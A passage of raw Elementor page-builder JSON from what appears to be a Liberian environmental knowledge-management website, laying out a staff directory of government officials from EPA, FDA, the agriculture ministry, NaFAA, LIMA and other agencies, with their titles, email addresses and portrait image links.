":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/bgoll.png\",\"id\":3596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong>\\n<p>EIA Manager <\\/br>FDA <\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll BSc, MSc.<\\/strong><br \\/>Conservation Manager<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b40c80d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8bb2d6d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7932328\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b158b68\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"a79d62d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7d0d9ed\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f289365\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"1d3b712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"6290cd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ea6ac52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jlopleh Dennis Wiagbe <\\/strong><br \\/>Director\\/M&amp;E<br \\/>MOA<br \\/><a href=\\\"mailto:jdmne12@gmail.com\\\">jdmne12@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Halala Willie Kokulo <\\/strong><br \\/>Director\\/Crop Resources<br \\/>MOA<br \\/><a href=\\\"mailto:kokulohalala@gmail.com\\\">kokulohalala@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"755c46b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"399f512\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"49c1380\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4032246\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"2179c05\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7f527f1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"713d262\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8cbd31\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"05b84b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9540449\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Roosevelt Carlos Reeves <\\/strong><br \\/>Agricultural Mechanization Technologist<br \\/>MOA<br \\/><a href=\\\"mailto:rcreeves@gmail.com\\\">rcreeves@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cfc0f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"baed7dc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c5f9301\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b97200c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\n<\\/br>\\nManager\\n<\\/br>\\nDepartment of Marine Fisheries and Environment\\n<\\/br>\\nNaFAA\\n<\\/br>\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Martin Killen <\\/strong><br \\/>IT Officer<br \\/>NaFAA<br \\/><a href=\\\"mailto:maskillen@nafaa.gov.lr\\\">maskillen@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"625a74e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9bf0510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e162bb8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"593819f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3ef1bd5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"334f9e9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":f